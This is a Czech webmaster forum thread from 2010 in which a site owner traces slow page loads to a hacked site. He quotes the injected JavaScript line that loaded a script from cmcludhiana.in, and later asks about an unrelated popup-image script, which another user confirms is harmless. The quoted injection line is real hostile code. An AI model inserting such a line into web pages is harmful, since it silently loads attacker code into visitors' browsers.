Autor | Zpráva | ||
---|---|---|---|
msigmund Profil |
Dobrý den, prosím o radu, kde je problém?
Co se stalo: Včera asi tři hodiny se mi web načítal přes 1minutu v prohlížeči a na liště dole to psalo "Připojuji se na cmcludhiana.in...". Odstranil jsem z webu vše co směřovalo ven a scripty, prostě zůstal jen čistý text načtený z db a menu s interními odkazy, php jsem zkontroloval jestli tam není vir či cokoli co tam nemá co dělat. Nic se nezměnilo, stále načítání stránek přes jednu minutu a dole to stále psalo "Připojuji se na cmcludhiana.in...". Podotýkám, že jsem na stránce neměl nic než text. Psal jsem to samé jako zde, poskytovateli hostingu a jeho odpověď mě zarazila. "lituji, že se Vám aplikace pomalu načítá, ale nemůžeme být odpovědni za obsah, který načítáte či importujete z jiných webů, které nejsou vedeny u nás." Kde se stala chyba? |
||
tiso Profil |
#2 · Zasláno: 7. 3. 2010, 12:32:03
msigmund: Prolém s vírusom si už na stránke mal, takže si asi nehľadal poriadne.
|
||
Davex Profil |
#3 · Zasláno: 7. 3. 2010, 13:07:19
msigmund:
Třeba máš špatně ošetřené vkládání souborů pomocí include() a ten šmejd se tam tudy dostává nebo si ve skriptech přehlédl nějaká zadní vrátka. |
||
msigmund Profil |
#4 · Zasláno: 7. 3. 2010, 13:23:49
Prošel jsem to vše, ale nekoukal jsem do JS a koukám, že tam opravdu byl šmejd:
document.write('<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ><\/script>'); Odstranil jsem to, změnil heslo na FTP a načítaní je rychlé, ale stačí to? Jak se tam proboha dostal! V PC ani prohlížeči nemám uložena hesla, někde jo ale jsou jiná (fiktivní). Myslíte, že to má souvislost s nedávným nabouráním do Banánu, tam mám hostuji. Děkuji za reakce. |
||
vynalezce Profil |
#5 · Zasláno: 7. 3. 2010, 15:30:30 · Upravil/a: vynalezce
msigmund:
Staci to? Zkontroluj, jestli nekde nemas nejaky php kod, ktery tam byt nema |
||
Davex Profil |
#6 · Zasláno: 7. 3. 2010, 15:48:00
msigmund:
Kromě zneužití FTP přístupu se tam mohl dostat mezerou v zabezpečení webové aplikace. vynalezce: Proč by měl mít hack hostingu z letošního ledna něco společného s nežádoucím kódem na webu od loňského října (viz [#2])? Kdyby to souviselo s lednovým incidentem, tak by byla nákaza mnohem masivnější napříč všemi weby u stejného hostingu. |
||
vynalezce Profil |
#7 · Zasláno: 7. 3. 2010, 15:57:06
Davex:
co, ze? On ten link nevede na nase faq? Toho jsem si nevsiml. Za dezinformaci se omlouvam. |
||
msigmund Profil |
#8 · Zasláno: 8. 3. 2010, 17:04:07
Už to mám. Dlouho jsem pátral až jsem ho našel.
A dokonce jsem si ho tam já bl... nahrál sám, když jsem pro známého stáhl css templates na e-shop "electronix" a nahrál na ftp, aby si ho stáhl. V jednom souboru bylo: <script> PositionX = 100; PositionY = 100; defaultWidth = 500; defaultHeight = 500; var AutoClose = true; if (parseInt(navigator.appVersion.charAt(0))>=4){ var isNN=(navigator.appName=="Netscape")?1:0; var isIE=(navigator.appName.indexOf("Microsoft")!=-1)?1:0;} var optNN='scrollbars=no,width='+defaultWidth+',height='+defaultHeight+',left='+PositionX+',top='+PositionY; var optIE='scrollbars=no,width=150,height=100,left='+PositionX+',top='+PositionY; function popImage(imageURL,imageTitle){ if (isNN){imgWin=window.open('about:blank','',optNN);} if (isIE){imgWin=window.open('about:blank','',optIE);} with (imgWin.document){ writeln('<html><head><title>Loading...</title><style>body{margin:0px;}</style>');writeln('<sc'+'ript>'); writeln('var isNN,isIE;');writeln('if (parseInt(navigator.appVersion.charAt(0))>=4){'); writeln('isNN=(navigator.appName=="Netscape")?1:0;');writeln('isIE=(navigator.appName.indexOf("Microsoft")!=-1)?1:0;}'); writeln('function reSizeToImage(){');writeln('if (isIE){');writeln('window.resizeTo(300,300);'); writeln('width=300-(document.body.clientWidth-document.images[0].width);'); writeln('height=300-(document.body.clientHeight-document.images[0].height);'); writeln('window.resizeTo(width,height);}');writeln('if (isNN){'); writeln('window.innerWidth=document.images["George"].width;');writeln('window.innerHeight=document.images["George"].height;}}'); writeln('function doTitle(){document.title="'+imageTitle+'";}');writeln('</sc'+'ript>'); if (!AutoClose) writeln('</head><body bgcolor=ffffff scroll="no" onload="reSizeToImage();doTitle();self.focus()">') else writeln('</head><body bgcolor=ffffff scroll="no" onload="reSizeToImage();doTitle();self.focus()" onblur="self.close()">'); writeln('<img name="George" src='+imageURL+' style="display:block"></body></html>'); close(); }} </script> Je to ono,že jo? Co to dělá? Za dobrotu na žebrotu, měl jsem si zkontrolovat co tam nahrávám. |
||
Davex Profil |
#9 · Zasláno: 8. 3. 2010, 17:28:17
msigmund:
Není to ono. Toto je Javascript a pomocí něho se nedá modifikovat zdrojový kód PHP skriptů na hostingu. „Co to dělá?“ Je tam definována funkce, pomocí které se zobrazují obrázky ve vyskakovacím okně. |
||
msigmund Profil |
#10 · Zasláno: 9. 3. 2010, 16:15:03 · Upravil/a: msigmund
vynalezce:
„Zkontroluj, jestli nekde nemas nejaky php kod, ktery tam byt nema“ Tak jsem nenašel nic jiného než: document.write('<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ><\/script>'); include() mám ošetřené, to jsem kontroloval, tak tedy nevím jak se to tam dostalo. Jak to mohlo infikovat jak doménu tak i subdomény, nechápu. Jinak všem děkuji. |
||
Časová prodleva: 16 let
|
0